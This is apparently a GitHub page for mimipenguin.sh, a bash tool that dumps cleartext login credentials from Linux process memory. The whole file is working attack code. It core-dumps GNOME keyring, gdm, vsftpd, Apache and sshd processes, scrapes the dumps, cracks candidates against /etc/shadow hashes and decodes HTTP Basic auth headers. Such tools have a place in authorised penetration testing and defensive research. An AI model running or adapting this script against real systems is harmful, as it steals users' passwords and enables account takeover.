forked from huntergregal/mimipenguin
-
Notifications
You must be signed in to change notification settings - Fork 1
/
mimipenguin.sh
executable file
·199 lines (182 loc) · 7.09 KB
/
mimipenguin.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
#!/bin/bash
# Author: Hunter Gregal
# Github: /huntergregal Twitter: /huntergregal Site: huntergregal.com
# Contribution from pugilist - PID extraction method
# Dumps cleartext credentials from memory
#root check
if [[ $EUID -ne 0 ]]; then
echo "Root required - You are dumping memory..."
echo "Even mimikatz requires administrator"
exit 1
fi
#Store results to cleanup later
export RESULTS=""
parse_pass ()
{
#$1 = DUMP, $2 = HASH, $3 = SALT, $4 = SOURCE
#If hash not in dump get shadow hashes
if [[ ! $2 ]]; then
SHADOWHASHES="$(cat /etc/shadow | cut -d':' -f 2 | egrep '^\$.\$')"
fi
#Determine password potential for each word
while read -r line; do
#If hash in dump, prepare crypt line
if [[ $2 ]]; then
#get ctype
CTYPE="$(echo $2 | cut -c-3)"
#Escape quotes to pass into crypt
SAFE="$(echo $line | sed 's/\"/\\"/g')"
CRYPT="\"$SAFE\", \"$CTYPE$3\""
if [[ `python -c "import crypt; print crypt.crypt($CRYPT)"` == $2 ]]; then
#Find which user's password it is (useful if used more than once!)
USER="$(cat /etc/shadow | grep ${2} | cut -d':' -f 1)"
export RESULTS="$RESULTS$4 $USER:$line\n"
fi
#Else use shadow hashes
elif [[ $SHADOWHASHES ]]; then
while read -r thishash; do
CTYPE="$(echo $thishash | cut -c-3)"
SHADOWSALT="$(echo $thishash | cut -d'$' -f 3)"
#Escape quotes to pass into crypt
SAFE="$(echo $line | sed 's/\"/\\"/g')"
CRYPT="\"$SAFE\", \"$CTYPE$SHADOWSALT\""
if [[ `python -c "import crypt; print crypt.crypt($CRYPT)"` == $thishash ]]; then
#Find which user's password it is (useful if used more than once!)
USER="$(cat /etc/shadow | grep ${thishash} | cut -d':' -f 1)"
export RESULTS="$RESULTS$4 $USER:$line\n"
fi
done <<< "$SHADOWHASHES"
#if no hash data - revert to checking probability
else
if [[ $line =~ ^_pammodutil.+[0-9]$ ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ ^LOGNAME= ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ UTF\-8 ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ ^splayManager[0-9]$ ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ ^gkr_system_authtok$ ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ [0-9]{1,4}:[0-9]{1,4}: ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ Manager\.Worker ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ \/usr\/share ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ \/bin ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ \.so\.[0-1]$ ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ x86_64 ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ (aoao) ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
elif [[ $line =~ stuv ]]; then
export RESULTS="$RESULTS[LOW]$4 $line\n"
else
export RESULTS="$RESULTS[HIGH]$4 $line\n"
fi
fi
done <<< "$1"
}
#Support Kali
if [[ `uname -a | awk '{print tolower($0)}'` == *"kali"* ]]; then
SOURCE="[SYSTEM - GNOME]"
#get gdm-session-worker [pam/gdm-password] process
PID="$(ps -eo pid,command | sed -rn '/gdm-password\]/p' | awk 'BEGIN {FS = " " } ; { print $1 }')"
gcore -o /tmp/dump $PID >& /dev/null
HASH="$(strings "/tmp/dump.${PID}" | egrep -m 1 '^\$.\$.+$')"
SALT="$(echo $HASH | cut -d'$' -f 3)"
DUMP="$(strings "/tmp/dump.${PID}" | egrep '^_pammodutil_getpwnam_root_1$' -B 5 -A 5)"
DUMP="${DUMP}$(strings "/tmp/dump.${PID}" | egrep '^gkr_system_authtok$' -B 5 -A 5)"
#Remove dupes to speed up processing
DUMP=$(echo $DUMP | tr " " "\n" |sort -u)
parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
#cleanup
rm -rf "/tmp/dump.${PID}"
fi
#Support Ubuntu
if [[ `uname -a | awk '{print tolower($0)}'` == *"ubuntu"* ]]; then
SOURCE="[SYSTEM - GNOME]"
#get /usr/bin/gnome-keyring-daemon process
PID="$(ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk 'BEGIN {FS = " " } ; { print $1 }')"
gcore -o /tmp/dump $PID >& /dev/null
HASH="$(strings "/tmp/dump.${PID}" | egrep -m 1 '^\$.\$.+$')"
SALT="$(echo $HASH | cut -d'$' -f 3)"
DUMP=$(strings "/tmp/dump.${PID}" | egrep '^.+libgck\-1\.so\.0$' -B 10 -A 10)
DUMP+=$(strings "/tmp/dump.${PID}" | egrep -A 5 -B 5 'libgcrypt\.so\..+$')
#Remove dupes to speed up processing
DUMP=$(echo $DUMP | tr " " "\n" |sort -u)
parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
#cleanup
rm -rf "/tmp/dump.${PID}"
fi
#Support VSFTPd - Active Users
if [[ -e "/etc/vsftpd.conf" ]]; then
SOURCE="[SYSTEM - VSFTPD]"
#get nobody /usr/sbin/vsftpd /etc/vsftpd.conf
PID="$(ps -eo pid,user,command | grep vsftpd | grep nobody | awk 'BEGIN {FS = " " } ; { print $1 }')"
#if exists aka someone logged into FTP then extract...
if [[ $PID ]];then
while read -r pid; do
gcore -o /tmp/vsftpd $PID >& /dev/null
HASH="$(strings "/tmp/vsftpd.${pid}" | egrep -m 1 '^\$.\$.+$')"
SALT="$(echo $HASH | cut -d'$' -f 3)"
DUMP=$(strings "/tmp/vsftpd.${pid}" | egrep -B 5 -A 5 '^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$')
#Remove dupes to speed up processing
DUMP=$(echo $DUMP | tr " " "\n" |sort -u)
parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
done <<< $PID
#cleanup
rm -rf /tmp/vsftpd*
fi
fi
#Support Apache2 - HTTP BASIC AUTH
if [[ -e "/etc/apache2/apache2.conf" ]]; then
SOURCE="[HTTP BASIC - APACHE2]"
#get all apache workers /usr/sbin/apache2 -k start
PID="$(ps -eo pid,user,command | grep apache2 | grep -v 'grep' | awk 'BEGIN {FS = " " } ; { print $1 }')"
#if exists aka apache2 running
if [[ $PID ]];then
#Dump all workers
while read -r pid; do
gcore -o /tmp/apache ${pid} >& /dev/null
done <<< $PID
#Get encoded creds
DUMP="$(strings /tmp/apache* | egrep '^Authorization: Basic.+=$' | cut -d' ' -f 3)"
#for each extracted b64 - decode the cleartext
while read -r encoded; do
CREDS="$(echo $encoded | base64 -d)"
if [[ $CREDS ]]; then
export RESULTS="$RESULTS$SOURCE $CREDS\n"
fi
done <<< "$DUMP"
#cleanup
rm -rf /tmp/apache*
fi
fi
#Support sshd - Search active connections for Sudo passwords
if [[ -e "/etc/ssh/sshd_config" ]]; then
SOURCE="[SYSTEM - SSH]"
#get all ssh tty/pts sessions - sshd: user@pts01
PID="$(ps -eo pid,command | egrep 'sshd:.+@' | grep -v 'grep' | awk 'BEGIN {FS = " " } ; { print $1 }')"
#if exists aka someone logged into SSH then dump
if [[ $PID ]];then
while read -r pid; do
gcore -o /tmp/sshd $PID >& /dev/null
HASH="$(strings "/tmp/sshd.${pid}" | egrep -m 1 '^\$.\$.+$')"
SALT="$(echo $HASH | cut -d'$' -f 3)"
DUMP=$(strings "/tmp/sshd.${pid}" | egrep -A 3 '^sudo.+')
#Remove dupes to speed up processing
DUMP=$(echo $DUMP | tr " " "\n" |sort -u)
parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
done <<< $PID
#cleanup
rm -rf /tmp/sshd.*
fi
fi
#Output results to STDOUT
printf "MimiPenguin Results:\n"
printf "$RESULTS" | sort -u
unset RESULTS